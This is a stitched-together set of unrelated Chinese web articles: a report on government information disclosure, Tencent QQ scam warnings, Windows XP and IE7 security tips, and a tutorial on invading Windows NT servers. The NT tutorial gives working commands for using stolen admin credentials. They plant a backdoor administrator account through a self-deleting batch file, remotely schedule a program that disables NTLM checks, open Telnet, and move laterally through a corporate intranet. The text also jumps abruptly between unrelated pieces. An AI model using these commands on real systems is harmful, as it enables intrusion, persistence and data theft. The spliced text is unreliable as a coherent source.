透过此案,信息公开与民众需求的不对称现象可见一斑.根据计世资讯2006年初发布的《政府门户网站评估实践体会》进一步显示,政府信息公开成长很快.但是“关键政府信息公开不够,涉及信息资源整合、在线服务能力等方面更是明显不足”.

记者的调查也恰好印证了计世资讯的观点.一些专家和地方政府网站的维护人员告诉记者,政府信息公开的难度很大,在条例本身、权力分配,以及业务部门与IT部门的协同上存在诸多难点.

条例存在两难选择

专家表示,《信息公开条例》带来两个矛盾体,在落实中需要引起人们的注意和重视.

一个是公开与保密的冲突.既然政府信息公开的标准和权力主要掌握在行政机关

手中,那么,如何才能防止行政机关以“保密”为由,拒绝公开一些原本并不涉及国家秘密、商业秘密、个人隐私的政府信息?另外,据记者了解,《中华人民共和国保守国家秘密法》是全国人大常委会通过的法律,《条例》是国务院通过的行政法规,前者的法律效力等级高于后者,不但如此,《条例》中的第14条也规定,行政机关在公开政府信息前,应当依照《中华人民共和国保守国家秘密法》以及其他法律、法规和国家有关规定对,拟公开的政府信息进行审查.这也就意味着,从逻辑上讲,政府信息公开的要求应符合“保密”的要求.

另一个是“排除法”与“列举法”的矛盾.全国政府信息公开领导小组办公室有关负责人曾表示,政府信息公开制度的理念是“以公开为原则、以不公开为例外”. “以不公开为例外”其实就是“排除法”;同时《条例》又采取了“列举法”,比较详细地规定了政府主动公开信息的事项.尽管“列举法”无可厚非,但是我们也必须看到,在许多情况下,“列举法”可能助长行政部门的惰性——对于一些在《条例》中没有列举的信息,行政机关可以公开、也可以不主动公开,而这种不公开也不会承担法律责任.

早在2003年,《政府信息公开条例》的草案就基本完成时,中国社会科学院法学研究所周汉华教授就判定:“当政府信息公开与不公开的边界出现模糊,不容易确定时,可通过利益平衡原则,根据对社会的损害和效益分析,决定是否应该公开政府信息.”但是据记者了解,刚刚出台的条例并未对这些内容做详细规定,只是将某些内容揉进了整体内容中,所以更加凸现了上述两点矛盾.

基于此种状况,人们普遍认为,出台条例的相关细则势在必行.

权力与法规的较量

在条例颁布几天后,记者开始向相关人士调查,但多数政府官员在被问及如何落实《政府信息公开条例》时,表示并未仔细观看条例,有的还反问记者“已经颁布了吗,还没有听说,也没有制定应对措施.”而反观记者采访第三方研究机构,他们已经把《政府信息公开条例》逐条审视.

随着IT技术的不断成熟,构建电子政务的各项关键技术应该说都已基本成熟,为什么有的政府网站做得好,有的做的不好呢?记者在一次电子政务大会上无意间听到某些官员的谈话:“一旦政府信息公开了以后,网上也可以办公了,要我们这些人干什么?”记者除了感到惊讶外,也不免“有些理解”——政府信息公开必将限制某些官员手中的权力,老百姓办事不再受他们的束缚,这无形也是消弱了人家“手中的权力”?然而,也正是这种观念对《信息公开条例》的落实起了很大的阻碍作用.

国家行政学院教授汪玉凯认为,此项条例的实施必将是一个艰难的、长期的过程.

首先,《政府信息公开条例》暂时只是一个条例,还没有上升到法律层面.从政府角度来讲,尽管多年来一直强调政府信息公开,但政府信息公开与否的主导权几乎完全掌握在政府官员或政府机构的手中,既然没有法律规定,政府官员和政府机构认为某些政府信息不需要公开就完全可以不公开,反正不违法;其次,尽管《政府信息公开条例》已经颁布了,但是细看条例还有许多地方不明朗,到底什么样的信息属于公开、不公开的范围,没有一个细则去区分,这样也会出现“人为判定”.这些都会大大影响条例的落地.

中国政府对市场和社会的管理作用比西方国家要大得多,政府的管理方式也和国外有很大不同.这种不同表现在管理观念、机构设置、部门职能、权力运行等多方面,这都对电子政务的发展产生了深远的影响.所以有人说电子政务的发展是“三分电子,七分政务,关键不在技术.”

参与了《政府信息公开条例》起草的周汉华认为,从其他国家的立法案例来看,采用信息公开制度的国家目前几乎制定的都是信息公开法,而不是条例.在中国,条例上升为法律,需要一定的过程.

IT与业务协同的矛盾

一位做了近4年地方门户网站的技术人员曾告诉记者,他所负责的网站都是自己在管理,相关行政部门一般不干涉他在上面传什么内容,只要不违法就行.而他为了吸引访问量传得大都是音乐、电影、图片和论坛等信息,因为政府部门没有往上添加政府信息,所以该网站成了名副其实的“个人网”.

地方政府把网站业务外包给他人这也无可厚非,但是如果只扔出去不管,必要时拿回来“撑面子”,这就违背《信息公开条例》的初衷了.

《政府信息公开条例》规定,各级政府应当主动公开和自身行政业务相关的信息,相关机构负责信息的公开以及维护更新.政府信息公开的比较普遍的一个途径是政府网站.政府部门把建设、维护网站这部分业务外包给别人来做无可厚非,但是之后便不管不问了就错了,轻则浪费国家资源,重则擅离职守.

除了上述把政府门户网站外包出去不加管理这个问题外,导致许多政府门户网站的政府信息匮乏的还有更致命的一个原因——政府内部各业务部门之间的不协同.

据记者了解,尽管各个政府部门在宣传自己的信息化功绩时,都提到为老百姓提供透明的、一站式服务,但国家行政学院教授汪玉凯却认为,这种情况还远远没有到到来.他认为,一站式服务需要涉及很多的部门和信息资源,不用说部门之间的人的觉悟如何,彼此的信息系统就不能达到统一.

某地方网站信息中心的一位专员向记者反映:“有的部门网络是自己建,软件自己开发或是自己买,各建各的数据库,都想强化本部门的重要性,根本不会把信息给我们,我们只有求着他们要信息,但这种求人的事,谁也不愿意做,反正没有人要求必须把什么信息传到网上,我们就自己搜.”当记者问到《信息公开条例》的实施是否会对此产生影响时,该人士强调,他们也希望条例的出台能够给网站的内容带来好的影响,但目前还没有具体严格执行,相关的协调监督机制还没有看到.

黑幕大揭发：最卑鄙无耻的QQ骗术奇观

黑幕大揭发：最卑鄙无耻的QQ骗术奇观

　　最新案例：假冒腾讯网站骗取浏览量

　　实际案例：

　　目前许多冒充腾讯的网站，打着送Q币或赠送QQ号的旗号，要求用户在对话框输入QQ号码以及密码。网站地址多为有qq字样， 点击进入页面有仿制QQ公仔形象，页面正中有明显要求输入QQ号，密码，验证码的对话框。目前此些网站多为骗取用户点击率，但将来有可能发展为盗号的一种手段。

　　行骗伎俩：

　　此网站要求用户输入QQ号码和QQ密码后，此时是没有进行任何验证的，或验证码框形同虚设，无任何验证作用。因为这些网站是无法取得腾讯任何信息，如果用户在此输入QQ号码和密码后，这些信息将被他人收集，从而有可能盗取您的QQ号码。

　　以下是目前出现频率，举报率较高的假冒网站，请广大用户关注，并友善提醒身边Q友。



　　温馨提示：

　　请广大用户注意，http://www.qq.com为我司正式站点，关注我司服务及相关活动，请进入http://www.qq.com了解详情。欢迎广大用户对这种危害用户利益的假冒网站进行踊跃的举报，让我们一起共同维护Q世界的纯净空间。

　　最新案例：冒充系统广播,骗取手机费用

　　实际案例：

　　某用户的手机号码于10月31日收取来自977702XX774或1700002XX774的下行信息：“恭喜你成功订阅了XXX业务每月将收取服务费30元，退订请编辑DQ01#EXIT80发送至921X”。

　　行骗伎俩：

　　骗子通过QQ客户端的短信渠道下发信息给用户，目的是骗取用户的手机费用；经我公司调查，短信内容中的“DQ01#EXIT80发送至921X”实际是某网站的订制某游戏业务中获取秘籍的指令，目的是让用户收到此信息后，以为自己曾订制过某项业务，为了不再被收取费用，急急忙忙按短信内容发送“退订”；此时用户正中陷阱，原以为是退订业务，反而变成定制业务，导致自己的手机费用受到损失。

　　目前腾讯客服热线已接收不少类似投诉，由于骗子通过我司提供的短信渠道下发，请广大用户在接到该类信息的时候注意分辨清楚，提高警惕。

最新案例：冒充黑客,骗取QQ号码

　　

　　在某些论坛上有这样的贴子,声称几个黑客成功的潜入了腾讯公司的主页到了一些有价值的数据和漏洞。原理是进入腾讯公司的主页后，他们在服务器上搞了个可以自动读取指令的QQ412630870：，公司的管理员就是通过发指令给这样QQ来完成比较简单的工作的（比如说收回QQ和找回密码等等）这个QQ的号码是：283128315（腾讯公司为了 不引起大家的注意，所以这个QQ比较普通，这个QQ一般隐身，

　　(1)发代码

　　{Jerusalum/PLO********}{Vesselin Bontchev@@@@}{FRALDMUZK ###}

　　(*****填上QQ号码，@@@@填上QQ密码，###填你申请Q币的个数 ，

　　(2)等着收Q币吧

　　(3)还可以得到好号的ＱＱ，具体操作不在这里公布.

　　行骗伎俩：

　　一看就知道283128315是这个骗子的ＱＱ，这个骗子煞有其事地喧染一番，让别人相信他，让相信他的人发代码给他，里面有相信者的号码＋密码，他坐着等收ＱＱ号码了。

　　最新案例：嫁接短信，诱骗梦网密码

　　

　　部分省市的用户可以用手机移动梦网的密码来开通网站的服务，行骗者用嫁接短信的方式，在不被用户发觉的情况下引导用户修改梦网密码并获取使用，来用手机支付开通我司或其它网站的服务。

　　实际案例：

　　(1) 行骗者(QQ：3211xx)使用移动QQ给用户下发短信, 发送号为"170003211xx"(3211xx为该骗子的QQ号码) 内容为：“恭喜你成功订约了移动宝典每月将收取服务费30元，退定请回复86 （在24小时内退定不收取任何费用）。”

　　(2) 行骗者登陆移动梦网，输入用户手机号码，点击“忘记密码”，此时梦网会自动下发“尊敬的用户， 您的密码是*****，欢迎登陆移动梦网”到用户手机。

　　(3) 用户收到行骗者发的消息时会直觉性地想取消服务，然后再收到梦网下发的取回密码消息，还有些莫名其妙时。

　　(4) 行骗者(QQ：3211xx)再次使用移动QQ给用户下发短信, 发送号为“170003211xx”， 内容为：“确认关闭此服务请尽快回复我们发给你的验证密码 感谢您的使用！”

　　(5) 用户会想当然地回复刚收到的梦网密码，行骗者获得。

　　(6) 行骗者用梦网密码开通我们网站或其它网站的服务。

　　行骗伎俩：

　　此案例行骗者手法较隐蔽，对移动通信运营商和网站的服务较为了解并操作熟练，转换应运移动运营商和网站的短信服务，用嫁接手法把短信综合使用，被骗者不容易发现。

　　典型案例一：久违的“老同学”突然向你借钱

　　

　　接到几例用户反馈，称：很久没有联系的老同学，突然以QQ自写短信方式联系自己，先寒暄几名，之后便说：母亲生病，XX癌，还欠些钱，想先向同学们借点儿，日后会还，又问其他同学的联系方式；因老同学即能叫出自己准确的姓名，且又有种见义勇为的冲动，即将钱按对方提供的银行帐号汇去，从此“同学”消失，才知上当受骗。

　　典型案例二：意外的中奖消息传播木马病毒

　　近期，我公司又发现有不法分子假冒“腾讯公司”名义，虚构腾讯公司送奖送QQ号等不实内容，利用电子邮件携带附件的方式向广大QQ用户和网友发送木马病毒。此外，行骗者还利用“QQ admin”、“腾讯管理员”、“腾讯公司送号员”以及帅哥靓妹等身份为掩护，通过QQ信息向Q友们发送木马病毒附件和链接。

QQ信息行骗实例：

　　2003-08-22 16:09:47 971XX (QQ送奖员)

　　恭喜您中了本公司幸运抽奖，请选择奖品（50枚Q币）（会员卡一张），请输入您正确的QQ号和密码，以及你想要的奖品。

　　2004-04-22 16:09:47 1399992XX (腾讯公司)

　　请把您的手机号以及您的详细地址发给我，以便于我们联系。您的奖品是用QQ公司提供的价值2880元的家用电脑一部，以及由移动公司提供的100小时的话费卡一张。

　　2004-04-13 21:24:28 1308811XX (QQadmin)

　　您好,我是腾讯公司的职员,您的QQ已中奖,您可以收到我们公司送您的QQ两个和3000元手机费，但是您必须得有手机才行,钱和QQ会发到你的手机里，只要您能收到我们公司发给您的QQ验证串再发给我就可以了，系统就会自动发到您的手机上。客服热线:0755-83765566

　　行骗伎俩：



　　1.邮件的附件或QQ信息内容中的链接是一木马程序，一经运行，您的QQ密码就会丢失。

　　2.要求用户提交个人密码等资料，或者以其个人名义向你送出号码等礼品，借机骗取您的密码。

　　典型案例三：伪装成你梦中王子的网络骗子

　　2000年10月，某市公安局向我们反映，一名15岁少女离家多日未归，父母已向该公安机关报案。据其同学反映，该名少女9月初开始使用并迷恋于网络聊天，失踪前经常在离家不远的××网吧上网，根据这一线索，终于查明该少女于10月10日与一名男子在××酒吧相约会面。公安机关顺藤摸瓜，终于于11天后，在××省找到并解救出已遭拐卖的该名少女，犯罪分子被严惩。

　　少女获救后，解释说当时觉得网友见面会很新奇，而且觉得与她接触的网友言谈不俗，她很想见见，没想到竟然因为一时好奇而被拐卖，悔恨不已。

　　鉴于网络诈骗事件的日益增多，请广大网友注意识别骗子的各种手段。针对以上案例，用户可以做好一下防范措施：

　　1、如果用户自己没有操作手机开通任何业务，或者从未自己登录我们腾讯网站或任何网站操作过，手机上如果收到来历不明信息，建议大家不要进行任何操作，也不要随意将手机上的信息以口头或短信等方式泄露，可以直接拨打当地移动运营商的客服热线（如1860或10001）查询确认，联通热线是1001。

　　2、通过直接联系的方式，确定提出帮助需求的好友，如发现为诈骗事件，立即以各种方式通知其他好友，避免他人上当受骗。

　　3、不要轻信网络流传的信息，对于不熟悉或不知情的邮件、信息不要轻易查看信息或邮件提供的链接和附件。对于我公司的中奖业务，一般会采取直接联系方式联系用户，不会以邮件或信息等途径进行通知，同时，用户可以在我公司网站的相关页面查找到中奖信息公告。

　　4、青少年朋友应该保持正常的心态进行网络聊天交友，在不熟悉对方的情况下，不要轻易与对方单独见面。在与网友进行线下活动时，应向亲朋好友通报自己的行踪，同时，自身也要加强戒备心理。

案例一：发送非法12590广告信息，骗取电话费用

　　行骗伎俩：有一段时间没见你了，过得怎么样？最近比较少上Q. 因此特意 你点了一首超好听的歌，你用手机拨：ｌ２５加上９０６２０３３８就可以听了。 后面还有我的留言录音。^_^!记得去听，别辜负我一番心意哦! 听完了也点首给我听啊! 呵呵我下了。88.。

　　案例二：冒充QQ好友，发送诈骗消息

　　行骗伎俩：小猪头：(2007-01-18 11:03:30) 你好帮我个忙好吗?我同学叫我帮他汇500块钱急用! 我这边不方便汇你帮我汇好吗?他是（邮政）的卡 他的卡号是6221加 8855 加4000加 2585 加9XX 他姓（蒋）名（X明），名字三个字不要写错了！ 今天我的手机没电了. 弄好了直接给我 QQ留言，晚点我再还给你,拜托了!

　　 案例三：冒充腾讯公司，发送虚假QQ中奖信息欺骗用户

　　行骗伎俩：有人冒充腾讯公司员工，通过QQ向用户发送虚假信息，大意为腾讯公司针对QQ用户举办抽奖活动，现证实用户QQ中奖，要求用户按所提示联系方式去领奖。

　　案例四：发送虚假邮件骗取QQ资料　　

　　行骗伎俩：发邮件给用户以系统升级为由套出用户QQ密码进行盗取，以及盗取网友的Q币。

给windows目录加密码防止恶意软件入侵

无法查看这则摘要。请 点击此处查看博文。

全方位了解黑客如何入侵WindowsNT系统

全方位了解黑客如何入侵WindowsNT系统

作者：smtk　来源：赛迪网安全社区

【编者按：文中内容仅供参考，请勿用于不当之处！】

现在的企业当中一般都是使用的NT系统，也不得不承认，NT系统的确是非常适合企业使用的操作系统，然而“黑客”的攻击引来了企业信息安全危机……

得到了NT的管理员密码还能做什么，还不是想做什么就做什么呗。但到底能做什么呢？能详细答出来的只怕不会很多，而且很多企业系统管理员就认为密码为空没什么，因为他们压根就不知道“黑客”会怎么做。本文介绍的就是得到NT的管理员密码以后入侵一个企业计算机群的初级和中级手法，尤其是在一个大型企业当中，企业系统管理员的密码往往关系着整个公司的信息泄密，以及公司的数据的丢失，严重的影响到一个企业的发展和生存。

首先，我们先假定得到了某个企业的一台服务器192.168.0.1的Administrator的密码，而对方没有关闭139端口。

1.普通共享资源的入侵

这种入侵手法可说是NT最简单的入侵了。随便在自己机器的哪个窗口的地址栏里输入“\\192.168.0.1”大概等1-2秒，对方就会要求你输入用户名和密码，输入所得到的用户名和密码以后就可以进入，并可以看到这台服务器在企业中的共享资源了。由于权限是Admin所以你几乎可以删除对方共享资源里的任何东西。(如果设置了共享为只读那就没办法了)

2.默认及隐藏共享资源的入侵

在说这种入侵方法之前我先来给大家介绍一个NT的IPC$连接，在默认情况下NT系统有一个特殊的隐藏共享，就是IPC$共享。IPC$是专门用在NT中的一种管道通讯，NT系统之间的通讯大部分都在IPC$通讯中完成的。

这次手法相对高明一点，但还是很简单的。不过关键还是要看“黑客”如何利用了，有的人可能只能删删文件，有的人却可以利用这个留下后门，以便下次如果密码改变了后可以利用后门进入。同样在机器里随便打开一个窗口，在地址栏输入“\\192.168.0.1”就会要求输入密码，输入以后所看到的东西和前面介绍的一样。好了，现在同时也建立好IPC$连接了，其实在提示你输入密码时从输入窗口中也知道了是建立IPC$连接。然后我们再次在地址栏输入地址，这次输入的就有点不同了，输入“\\192.168.0.1\c$”大概过一会就出现了对方C盘里所有的内容了。想看对方D盘吗？同样，输入“\\192.168.0.1\D$”就看见对方D盘了。然后想换这个企业的主页(假如对方还是一个Web服务器)可以说是轻而易举。记住由于权限是管理员当然可以写了，留不留后门就看“黑客”的想法咯。一般他们会在C盘(假设在C:\\WINNT下)建立一个批处理文件，假设文件名为hack.bat，其内容一般为：

net user hack 1234 /add (建立一个用户名为hack的用户，密码为1234)

net localgroup administrators hack /add (让hack也是管理员)

del C:\Documents and Settings\Administrator\开始\菜单\程序\启动\hack.lnk (删除启动文件夹里

的快捷方式消除足迹)

del c:\winnt\hack.bat (删除hack.bat这个文件消除足迹)

这样当企业系统管理员在下次登陆时就会偷偷的添加一个用户了。当然其实添加用户算是一个比较愚蠢的留“后门”的方法了，所以其实很多“黑客”会放一个可以常驻内存的小程序，然后建立一个类似的批处理文件和快捷方式，那么“黑客”基本上可以长期的占有企业中的这台主机了。

3.IPC$连接入侵的高级手段

然而每个“黑客”都不可能那么笨，非要一直等到下次企业系统管理员登陆以后才可以占有，往往“黑客”会使用更加巧妙的手法，迅速的留下后门。首先他们还是先建立IPC$连接，连接以后他们会使用各种手法开后门，比如打开Telnet服务，“黑客”怎么打开Telnet服务呢？其实有很多种方法，比如微软公司自己就出了一个小程序“netsvc.exe”就是专门让系统管理员在建立IPC$连接以后远程打开服务用的管理工具，但这个工具到了“黑客”手中自然也成了必不可少的“黑客”工具了。在命令符下输入“netsvc \\192.168.0.1 telnet /start”大概等5分钟对方的Telnet服务就打开了，然后“telnet 192.168.0.1”嘿嘿……等！需要NTLM验证，这下又把“黑客”拦在了外面了，这时他们又会用到一个小程序了，就是专门关闭一个NTLM验证的程序ntlm.exe。(当然也可以是其他名字)“copy ntlm.exe \\192.168.0.1\admin$\system32”把ntlm.exe复制到对方企业服务器的system32目录下。复制过去了，可怎么让他运行呢？当然多的是办法了。“net time \\192.168.0.1”看看对方系统时间为多少假设为18:00。现在再输入“at \\192.168.0.1 18:02 ntlm.exe”，等一会后，命令提示符显示新加任务 ID=１，意思是对方系统在18：02时运行ntlm.exe这个程序，等到18:02以后，然后再“telnet 192.168.0.1”这回是提示需要输入用户和密码了，输入所得到的管理员用户名和密码以后就成功的Telnet到了企业服务器了……

不过这样一下是Netsvc，一下又是At实在是麻烦，现在就介绍另一个方法，首先还是先感谢微软为NT系统管理员提供的方便的管理功能，这一功能到了“黑客”手中可说是“黑客”的福音，不用“黑客”再这么麻烦的输入这样那样的命令了。建立好IPC$连接以后(IPC$连接果然是一种功能非常强大的管理连接)，打开本地计算机里的“计算机管理”，用鼠标右键点计算机管理窗口里的“计算机管理(本地)”里面有“连接到另一台计算机”选择它，在“名称”里输入“192.168.0.1”确定以后，首先你的NT系统会看是否建立IPC$连接，“有”就连接上去了，现在你就可以直接管理192.168.0.1了，比如看他的日志，启动他的服务(当然包括Telnet了)，管理他的IIS，什么都有。多研究一下，连注销对方系统当前登陆的用户，重新启动对方计算机，关闭对方计算机都有，真是强大。NT系统到了“黑客”手中，整个系统都成了一个“黑客”工具了，而且是功能非常强大的“黑客”工具。启动了Telnet了，可还是要NTLM验证怎么办？简单，在本地计算机建立一个用户名和密码相同的用户，如果已有就把密码改为相同，然后使用这个用户在本地重新登陆，“telnet 192.168.0.1”嘿嘿~连密码都不用输入了！因为通过NTLM验证了啊。

现在那些安全意识差的企业系统管理员们知道了暴露了管理员密码的危险性了吧？还没完呢。都到这一步了还没完？机器都被“黑客”完全控制了呀——是的，还没完，看吧！

4.深入入侵

这一步就需要“黑客”有丰富的经验，实战操作能力要求很高，也不再是文字能描述清楚的了，下面就只能粗略的介绍一下。

“黑客”当然不会仅仅在攻馅一台服务器以后就立刻罢手了，他会深入入侵你的内网，尤其是在一个企业中，往往都是计算机群。那些商业间谍“黑客”当然就更加的想入侵到企业内部去了。而很多企业系统管理员喜欢把所有的服务器的密码设为相同，就给“黑客”提供了一个良好的入侵条件。Telnet到对方服务器以后，输入“net view”企业中整个一个工作组或域的计算机这时都一展无余。同样在Telnet里建立IPC$连接以后象入侵这台服务器一样的入侵了。前面说的建立IPC$连接都是使用的图形界面，然而这时候已经不再拥有图形界面了，现在假设企业内网的192.168.0.2的密码和这台服务器密码相同，这时可以使用“net use \\192.168.0.2\IPC$ passwd/user:username”来建立IPC$连接了，然后是映射驱动盘，输入“net use z: \\192.168.0.2\c$”这样就把192.168.0.2的C盘映射到192.168.0.1的Z盘去了。输入“z:”就可以象浏览192.168.0.1的硬盘一样，浏览192.168.0.2的C盘。而如果他是商业间谍“黑客”，一旦发现里面有价值的东西自然不用说将来会发生什么事了。当然这往往还算是最好的条件，其实还是有相当一部分企业系统管理员不会把密码设为一样的。现在就看网络的情况了，如果入侵的正好是一台主域控制器，嘿嘿，那对于商业间谍来说可是高兴死了，赶快把自己升级成域管理员，这下整个企业的一个域的机器都落在了他的手中。当然在“黑客”手中这也算是一种非常好的情况，但现在微软行行色色的漏洞越来越多，同时也根据“黑客”的经验的多少，决定着入侵内网的机会的大小。

在一个企业中，往往直接连接Internet的是Web服务器。而一个有耐性的“黑客”，一个想入侵这个企业的商业间谍当然会不惜一切手段入侵，其中一个手法就是利用Web服务。微软公司在今年出现的MIME漏洞就有很好的利用价值。这里顺便介绍一下MIME漏洞，MIME在处理不正常的MIME类型中存在问题，攻击者可以建立一个包含可执行文件的附件的HTML，E-mail并修改MIME头，使IE不正确处理这个MIME，而执行所指定的可执行文件附件。有了这个漏洞，“黑客”将会更换Web服务器的主页，在主页里把MEMI漏洞攻击代码插进HTML中，使得企业内部的员工在浏览自己公司主页时运行指定的程序。(企业内部绝对不可能从来不看自己的主页的，尤其是企业负责人，他们一般都会不定期的检查主页。)那么他们在浏览自己的主页时就无声无熄的执行了“黑客”所指定的程序，这个程序可能是木马，也可能同样是添加用户的批处理文件。

由上面可以看出一旦NT系统的密码泄露是一件多么危险的事情，尤其在一个企业当中。同时一个企业网络的拓扑是否合理也起着非常重要的作用，并且“黑客”尤其是商业间谍所利用的手法远远不只有这些，他们还可以利用其它方式，比如电子邮件等各种途径来得到企业内部的敏感信息或保密信息。

5.其它入侵　　

其它还可以通过3389端口入侵。3389是Win2000系统的自带的，并且是图形界面的，远程管理服务的端口。“黑客”一旦有了管理员密码，危险性也更加直观化。另外就是通过IIS的管理入侵，在默认情况下IIS提供一个Web方式的管理服务，在c:\inetpub\wwwroot里有一个叫iisstar.asp的东西，如果可以访问，而且有管理员密码(NT4里不是管理员也可以，只要是NT的合法账号)就可以远程通过Web方式管理IIS信息服务，然后通过特殊手法进一步控制整个机器，然后是整个企业……

七招技巧 制造安全Windows XP操作系统

七招技巧 制造安全Windows XP操作系统

天极yesky

　　微软的新一代操作系统Vista已经推出一段时间，但由于用户硬件系统面临的更新换代以及软件与Vista系统的兼容等若干原因，大部分用户还是在广泛使用着Windows XP的系统。所以有必要旧话重提，在这篇文章中谈一些Windows XP的安全方面的操作策略，使尽可能地少一些来自于病毒、黑客方面的攻击。

　　1、屏蔽不需要的服务组件

　　尽管服务组件安装得越多，用户可以享受的服务功能也就越多。但是用户平时使用到的服务组件毕竟还是有限，而那些很少用到的组件不但占用了不少系统资源，会引起系统不稳定外，它还会为黑客的远程入侵提供了多种途径，为此我们应该尽量把那些暂不需要的服务组件屏蔽掉。具体的操作方法为：首先在控制面板中找到“服务和应用程序”图标，然后再打开“服务”对话框，在该对话框中选中需要屏蔽的程序，并单击鼠标右键，从弹出的快捷菜单中依次选择“属性”/ “停止”命令，同时将“启动类型”设置为“手动”或“已禁用”，这样就可以对指定的服务组件进行屏蔽了。

　　2、及时使用Windows Update更新系统

　　Windows Update做为微软公司保护系统安全、提高Windows性能的重要组件，目前已经走进了它的V6版本。通过它，我们不但可以获得提升系统功能和性能的组件Service Pack(如目前流行的Windows XP Service Pack 2)，同时也可以获得最新安全漏洞的补丁，当然你也可以获得最新的硬件驱动。最新、最流行的

病毒、木马、蠕虫等通常都利用了

操作系统的最新的漏洞，如果在它们大规模发作之前，就能升级好最新的补丁，那么计算机受到攻击导致瘫陷的几率将大大降低。

　　3、对重要信息进行加密

　　为防止其他人在使用自己的电脑时，偷看自己存储在电脑中的文件信息，Windows XP特意为我们普通用户提供了“文件和文件夹加密”功能，利用该功能我们可以对存储在电脑中的重要信息进行加密，这样其他用户在没有密码的情况下是无法访问文件或者文件夹中的内容的。在对文件进行加密时，我们首先打开Windows XP的资源管理器，然后在资源管理器操作窗口中找到需要进行加密的文件或者文件夹，然后用鼠标右键单击选中的文件或文件夹，从弹出的快捷菜单中选择“属性”命令，随后Windows XP会弹出文件加密对话框，单击对话框中的“常规”标签，然后再依次选择“高级”/“加密内容以便保护数据”就可以了。

　　4、锁定您的计算机

　　如果在使用电脑的过程中因有急事需要短暂离开电脑的话，许多人因担心自己的电脑会被别人占用，往往会采取先关机，后离开，然后回来再开机的办法来处理，但这样频繁开关机器对电脑是不利的。那我们有没有办法做到既不要关机又能防止其他人使用自己的计算机呢?办法当然是有的啦，您可以通过双击桌面快捷方式来迅速锁定键盘和显示器，而无需使用CTRL+ALT+DEL组合键或屏幕保护程序。

　　在锁定您的计算机时，您可以参照如下的步骤来执行：先用鼠标右键单击Windows XP的桌面，然后在右键菜单中依次选择新建/快捷方式，随后按照屏幕提示，在命令行的文本框中输入rundll32.exe user32.dll,LockWorkStation命令字符，再在随后的向导窗口中输入对应该快捷方式的具体名称，在这里为方便以后调用，您可以直接为该快捷方式取名为锁定计算机就可以了。以后您只要双击桌面上的“锁定计算机”，就可以达到锁定的目的了。或可以直接按下“windows键+L”的快捷键来锁定计算机。

5、使用“连接防火墙”功能

　　在网络时代中，病毒的传播方式、传播速度和破坏力发生了翻天覆地变化，而且黑客行为也正在全世界范围内活动。为了防止病毒和黑客的随意入侵，不少用户在自己的计算机中都安装了防火墙。而Windows XP就加入了“Internet 连接防火墙”功能，利用该功能，Windows XP能对出入系统的所有信息进行动态数据包筛选，允许系统同意访问的人与数据进入自己的内部网络，同时将不允许的用户与数据拒之门外，最大限度地阻止网络中的黑客来访问自己的网络，防止他们随意更改、移动甚至删除网络上的重要信息。在使用“连接防火墙”功能时，您可以依次单击开始菜单中的“设置”/“网络连接”菜单项，然后从弹出的窗口中选择需要上网的拨号连接，然后用鼠标右键单击该连接图标，并选择“属性”命令，在随后弹出的拨号属性窗口中再单击高级标签，在对应标签的页面中选中“Internet连接防火墙”选项，然后再单击对应防火墙的“设置”按钮，来根据自己的要求设置一下防火墙，以便防火墙能更高效地工作。

　　6、安装第三方的杀毒程序、防火墙程序及上网安全保护程序

　　事实证明，“Internet 连接防火墙”的功能局限性很大，首先它并不具备杀毒、防毒的功用，其次在防火墙技术上保护很有限，效果微乎其微。用户有必要在开启“Internet 连接防火墙”的基础上再加装第三方的防火墙程序。防火墙软件的选用，首先要看实际的防护效果，能不能有效及时地在程序访问外界的时候第一时间发出提示寻问，并且在受到外界的各类攻击时能不能有效地屏蔽、过滤掉数据包，瑞星防火墙更加入了“追踪位置”的技术，能实时地监视受到的攻击并主动追踪其位置。杀毒程序是必须要安装的，杀毒的效率是值得考虑的问题，另外实时防毒效果更应该受到关注。在防护方面，瑞星杀毒软件监控相当全面，注册表的监控最为有效地防范了恶意的程序、木马等在用户不知情的情况下植入计算机中。

　　7、为自己分配管理权限

　　安装在Windows XP操作系统中的许多程序，都要求用户具有一定的管理权限才能让用户使用程序，因此为了能够使用好程序，我们有时需要为自己临时分配一个访问程序的管理权限。在分配管理权限时，我们可以先普通用户身份登录到Windows XP的系统中，然后用鼠标右键单击程序安装文件，同时按住键盘上的Shift键，从随后出现的快捷菜单中点击运行方式，最后在弹出的窗口中输入具有相应管理权限的用户名和密码就可以了。

Vista系统内置IE 7安全性10点必知

ZDNet China

Internet Explorer 7的使用使得浏览网页更加安全。本文概括了IE7新安全性的特性，包括：Active X 选项、Phishing过滤器、交叉领域安全性、增强隐私保护、国际字符集声明。

虽然经常看到有关Internet Explorer 安全性瑕疵的报告，但事实上，微软一直尽最大努力使得IE更加安全。以下就是一些IE7的安全特性。

＃1：Active X控制器潜在危险的默认保护

不经过检验和校验保证安全，Active X控制将不会按默认自动运行。换句话说，借助Active X opt-in特性它们将会自动关闭。

＃2：Active X opt-in分区控制

根据分区原则，你可停用Active X opt-in。为了得到更好的安全性，在默认的互联网和受限站点区域它能够允许使用，而在企业内部网和可信站点区域内是设置为不可用。

＃3：Active X 控制器的站点和区域上锁

限制控制器运行在特定站点（已锁定）或者在专门安全区域（已锁定），开发人员可以使得Active X 操作更加安全。

＃4：phishing的保护

IE7引进了Phishing Filter，它能够保护用户不会稀里糊涂的键入能被盗窃者收集和使用的个人信息和密码。Phishing Filter自动检查访问的站点，对照已知的Phishing站点，它将会发布一个警告。只有当你认为站点可疑时，Phishing Filter才对站点进行检查。

IE7 安全机制防止了一种被称为交叉域脚本的攻击策略，它使得脚本只运行在原始安全的上下文，甚至让它们重定向到一个不同的安全域。

＃6：开放安全域

因为默认的更高安全设置，IE7中安全区域的开放性比以前更加严密。它关闭内部网中的无名主机，其接口使得选择低或中低安全性设置更为困难。

＃7：更好的SSL/TLS通告和认证信息

借助于SSL/TLS IE7的用户可以更容易的判断站点是否安全，获得发给站点的认证信息。

＃8：隐私保护特性

IE7包括被称为特性控制密钥的三个新的注册密钥，能够防止HTML获取用户个人信息。此外，仅需单击，你可以轻松地清除你在网页上的信息、浏览器缓存(临时互联网文件)、历史记录、cookies和其他个人信息。

＃9：地址栏

所有IE7的浏览器窗口都包含有一个地址栏，恶意站点通过隐藏URL的手段达到隐蔽身份的目的变得更加困难。

＃10：多国字符集声明

IE7支持多国字符集，防止弄混不同语言字符的相似性。在多国字符集使用的时候，浏览器会提示另一语言中对应的字符。

把Vista“超级系统管理员”还给我

天极yesky

作者： 江阳（原创）

